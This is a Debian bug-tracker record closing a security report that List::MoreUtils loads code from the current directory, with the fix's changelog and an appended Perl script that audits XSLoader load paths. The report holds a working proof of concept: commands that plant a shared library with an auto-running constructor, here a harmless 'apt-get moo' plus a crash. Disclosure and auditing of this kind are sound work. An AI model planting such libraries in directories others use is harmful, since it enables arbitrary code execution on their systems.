Your message dated Mon, 04 Jul 2016 17:49:54 +0000
with message-id <[email protected]>
and subject line Bug#829138: fixed in liblist-moreutils-perl 0.415-1
has caused the Debian Bug report #829138,
regarding liblist-moreutils-perl: tries to load code from cwd
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
829138: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829138
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: liblist-moreutils-perl
Version: 0.413-1+b1
Tags: security
Control: affects -1 + check-all-the-things
List::MoreUtils tries to load code from a subdirectory of the current
working directory. This could lead to execution of arbitrary code if
cwd is untrusted.
Proof of concept:
$ mkdir -p '(eval 1)/auto/List/MoreUtils/'
$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so'
$ perl -e 'no lib "."; use List::MoreUtils'
                 (__) 
                 (oo) 
           /------\/ 
          / |    ||   
         *  /\---/\ 
            ~~   ~~   
..."Have you mooed today?"...
Segmentation fault
-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 4.6.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages liblist-moreutils-perl depends on:
ii libc6 2.22-13
ii libexporter-tiny-perl 0.042-1
ii perl 5.22.2-1
ii perl-base [perlapi-5.22.1] 5.22.2-1
--
Jakub Wilk
/* moo.c: the proof-of-concept library built by the gcc command above */
#include <signal.h>
#include <stdlib.h>

/* constructor: runs automatically as soon as the shared object is loaded */
void __attribute__((constructor)) moo() {
    system("apt-get moo");
    kill(0, SIGSEGV);
}
--- End Message ---
--- Begin Message ---
Source: liblist-moreutils-perl
Source-Version: 0.415-1
We believe that the bug you reported is fixed in the latest version of
liblist-moreutils-perl, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated
liblist-moreutils-perl package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 04 Jul 2016 19:20:03 +0200
Source: liblist-moreutils-perl
Binary: liblist-moreutils-perl
Architecture: source
Version: 0.415-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Perl Group <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Closes: 829138
Description:
liblist-moreutils-perl - Perl module with additional list functions not found
in List::Uti
Changes:
liblist-moreutils-perl (0.415-1) unstable; urgency=medium
.
* Team upload.
.
[ Salvatore Bonaccorso ]
* debian/control: Use HTTPS transport protocol for Vcs-Git URI
.
[ gregor herrmann ]
* debian/copyright: change Copyright-Format 1.0 URL to HTTPS.
* debian/upstream/metadata: change GitHub/CPAN URL(s) to HTTPS.
.
[ Salvatore Bonaccorso ]
* Import upstream version 0.415
* Update copyright years for upstream files
* Update copyright years for included Config::AutoConf
* Simplify Build-Depends on just only perl.
The alternative version used as well to enforce the right version for
Test::More is already satisfied in wheezy. Make only a Build-Depends to
perl (unversioned).
* Declare compliance with Debian policy 3.9.8
* Drop unneeded patch makefile-author.patch (resolved in different way
upstream)
* debian/rules: Build enabling all hardening flags
* Add patch to fix spelling errors in Contributing POD
* Fix caller information passed down the stack.
List/MoreUtils/XS.pm calls XSLoader::load from inside a string eval
leading to the path used by XSLoader to determine the library to be
(eval 1)/List/MoreUtils/XS.pm.
Thanks to Jakub Wilk <[email protected]> (Closes: #829138)
--- End Message ---
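Both the report and the changelog entry "Fix caller information passed down the stack" come down to the same mechanism: XSLoader derives the .so path from the filename of the frame that calls XSLoader::load, and a string eval reports that filename as "(eval N)", so the probe path becomes relative to the cwd. The audit script below is an added example, not part of the bug report or the package: it wraps XSLoader::load, records every call whose caller filename is not absolute together with the path XSLoader would probe, and then loads the module named on the command line (assumed to be installed). Because XSLoader only uses the relative path when a file already exists there, inspecting the frame catches the condition even from an empty directory, where the proof of concept alone would show nothing.

```perl
#!/usr/bin/perl
# xsloader-caller-audit.pl (added example, not from the bug report or the
# package): load a module and flag every XSLoader::load call whose caller
# frame would make XSLoader probe a shared object relative to the cwd.
# Usage: perl xsloader-caller-audit.pl List::MoreUtils
use strict;
use warnings;
use Config;
use File::Spec;
require XSLoader;

my @findings;

{
    # Wrap XSLoader::load. The wrapper observes the same caller() frame the
    # real loader would see, then hands control to it with goto &$orig, which
    # replaces the wrapper's frame, so the module is still loaded as before.
    my $orig = \&XSLoader::load;
    no warnings 'redefine';
    *XSLoader::load = sub {
        my ($pkg, $modlibname) = caller();
        my $module = @_ ? $_[0] : $pkg;

        # Mirror XSLoader's own path derivation: drop one trailing path
        # component per package part, then append auto/<pkg path>/<leaf>.<dlext>.
        # Code run from a string eval reports its file as "(eval N)", which has
        # no directory component to strip and so yields a cwd-relative path.
        my @parts = split /::/, $module;
        my $c = @parts;
        $modlibname =~ s,[\\/][^\\/]+$,, while $c--;
        my $probe = "$modlibname/auto/" . join('/', @parts)
                  . "/$parts[-1].$Config{dlext}";

        push @findings, "$module: called from '$modlibname', probes $probe"
            unless File::Spec->file_name_is_absolute($modlibname);

        goto &$orig;
    };
}

my $module = shift or die "usage: $0 Module::Name\n";
(my $pm = "$module.pm") =~ s{::}{/}g;
eval { require $pm; 1 } or die "cannot load $module: $@";

if (@findings) {
    print "cwd-relative XS load path(s) while loading $module:\n";
    print "  $_\n" for @findings;
    exit 1;
}
print "ok: every XSLoader::load while loading $module used an absolute path\n";
exit 0;
```

A module with no XS component never calls XSLoader::load and therefore reports ok trivially; a relative entry in @INC is reported as well, since it leads to the same cwd-dependent load.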